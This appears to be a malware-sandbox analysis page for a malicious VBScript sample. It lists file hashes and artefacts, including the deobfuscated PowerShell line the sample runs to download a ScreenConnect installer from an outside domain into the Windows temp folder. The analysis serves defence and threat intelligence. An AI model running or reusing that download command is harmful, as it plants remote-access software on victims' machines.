Malicious

f6a74036fd2326337f18c424c57c49fb

VBScript
|
MD5: f6a74036fd2326337f18c424c57c49fb
|
Size: 5.03 KB
|
text/vbscript

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	f6a74036fd2326337f18c424c57c49fb
Sha1	b7c915132e72cba30a0cd6a11a5d3948ddec2355
Sha256	542feb5ab4ad77196b837adf10e237947ca01c4a69eac7613f8ebafba2d45908
Sha384	9a83d81f02fed1613d73b8986ac2ffab0b4682f01eb0f5bca23a4515963747c70f7259c01696abb68b98130d7b3a7fc7
Sha512	546c9069e0bde5d82a7eb78c35bdd800f40d432bd79fb55665a51b349d847fb25d58df48a78c65b240febe4efe07e39c8565f506ee01b24ad7b1ed1c3631a802
SSDeep	96:k1lxKOZHy/t2OaJnzOOsXpQZm5ZwdMoIvR5VDVa3gz13liqvgu:SlxfS/8JRJsZQEQMoI53mgzziygu
TLSH	38A17D1E5F23EEA42814828157BA291CFB8813579E805850BA7834D917613719ABF3DF

File Structure

Artefacts

Name0	Value
URLs in VB Code - #1	https://themaintechnician.us/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest
Deobfuscated PowerShell	try { (New-Object "Net.WebClient")."DownloadFile"("https://themaintechnician.us/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest", "C:\Windows\Temp\form.msi") exit 0 } catch { exit 1 }

f6a74036fd2326337f18c424c57c49fb (5.03 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
URLs in VB Code - #1	https://themaintechnician.us/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest	f6a74036fd2326337f18c424c57c49fb
Deobfuscated PowerShell	try { (New-Object "Net.WebClient")."DownloadFile"("https://themaintechnician.us/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest", "C:\Windows\Temp\form.msi") exit 0 } catch { exit 1 } Malicious	f6a74036fd2326337f18c424c57c49fb > f6a74036fd2326337f18c424c57c49fb.deobfuscated.vbs > [Command #0] > [PowerShell Command]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙